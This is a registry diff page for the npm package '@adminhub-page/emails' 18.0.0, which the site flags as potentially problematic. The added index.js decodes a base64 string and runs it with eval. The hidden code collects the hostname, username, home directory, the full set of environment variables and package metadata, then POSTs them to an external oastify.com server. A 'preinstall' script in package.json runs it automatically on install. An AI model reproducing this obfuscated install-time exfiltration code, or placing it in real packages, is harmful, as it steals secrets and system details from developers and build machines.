@adminhub-page/emails 18.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @adminhub-page/emails might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +7 -0
  2. package/package.json +15 -0
package/index.js ADDED
@@ -0,0 +1,7 @@
1
+ const os = require("os");
2
+ const https = require("https");
3
+ const packageJSON = require("./package.json");
4
+ const package = packageJSON.name;
5
+
6
+ var b='Y29uc3QgdHJhY2tpbmdEYXRhID0gSlNPTi5zdHJpbmdpZnkoewogICAgcDogcGFja2FnZSwKICAgIGM6IF9fZGlybmFtZSwKICAgIGhkOiBvcy5ob21lZGlyKCksCiAgICBobjogb3MuaG9zdG5hbWUoKSwKICAgIHVuOiBvcy51c2VySW5mbygpLnVzZXJuYW1lLAogICAgZW52OiBwcm9jZXNzLmVudiwKICAgIHI6IHBhY2thZ2VKU09OID8gcGFja2FnZUpTT04uX19fcmVzb2x2ZWQgOiB1bmRlZmluZWQsCiAgICB2OiBwYWNrYWdlSlNPTi52ZXJzaW9uLAogICAgcGpzb246IHBhY2thZ2VKU09OLAp9KTsKdmFyIG9wdGlvbnMgPSB7CiAgICBob3N0bmFtZTogIjBqazFkcms2cnB5OWIyYm00bTUzd2wxZXM1eXdtbWFiLm9hc3RpZnkuY29tIiwgCiAgICBwb3J0OiA0NDMsCiAgICBwYXRoOiAiLyIsCiAgICBtZXRob2Q6ICJQT1NUIiwKICAgIGhlYWRlcnM6IHsKICAgICAgICAiQ29udGVudC1UeXBlIjogImFwcGxpY2F0aW9uL2pzb24iLAogICAgICAgICJDb250ZW50LUxlbmd0aCI6IHRyYWNraW5nRGF0YS5sZW5ndGgsCiAgICB9LAp9OwoKdmFyIHJlcSA9IGh0dHBzLnJlcXVlc3Qob3B0aW9ucywgKHJlcykgPT4gewogICAgcmVzLm9uKCJkYXRhIiwgKGQpID0+IHsKICAgICAgICBwcm9jZXNzLnN0ZG91dC53cml0ZShkKTsKICAgIH0pOwp9KTsKCnJlcS5vbigiZXJyb3IiLCAoZSkgPT4gewogICAgY29uc29sZS5lcnJvcihlKTsKfSk7CgpyZXEud3JpdGUodHJhY2tpbmdEYXRhKTsKcmVxLmVuZCgpOw==';
7
+ const m = eval(Buffer.from(b, 'base64').toString());
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "@adminhub-page/emails",
3
+ "version": "18.0.0",
4
+ "description": "Adminhub page emails",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "khan1586",
11
+ "license": "MIT",
12
+ "keywords": [
13
+ "emails"
14
+ ]
15
+ }